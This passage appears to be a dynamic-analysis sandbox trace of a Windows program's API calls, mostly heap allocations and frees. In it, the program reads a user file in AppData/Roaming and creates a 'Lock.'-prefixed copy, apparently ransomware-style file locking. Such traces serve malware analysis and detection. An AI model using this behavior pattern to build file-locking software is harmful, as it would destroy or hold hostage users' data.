lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0220.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0220.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0220.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0220.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0220.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0220.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0220.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0220.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0220.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0220.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0220.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0220.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0220.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0220.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0220.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0220.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/0lKdr4kmMec0.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0lkdr4kmmec0.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0220.415] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.415] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0220.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0220.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0220.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0220.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0220.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x3be0e78 [0220.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0220.416] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0220.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0220.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0220.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14818 [0220.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0220.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.0lKdr4kmMec0.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.0lkdr4kmmec0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0220.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0220.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0220.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0220.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0220.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0220.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0220.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0220.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5d020 [0220.419] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0220.420] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0220.423] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x19e6, lpOverlapped=0x0) returned 1 [0220.423] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0220.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0220.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e6) returned 0x2f24820 [0220.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d020 | out: hHeap=0x970000) returned 1 [0220.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0220.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0220.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0220.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0220.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0220.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0220.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e6) returned 0x2f36210 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.464] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 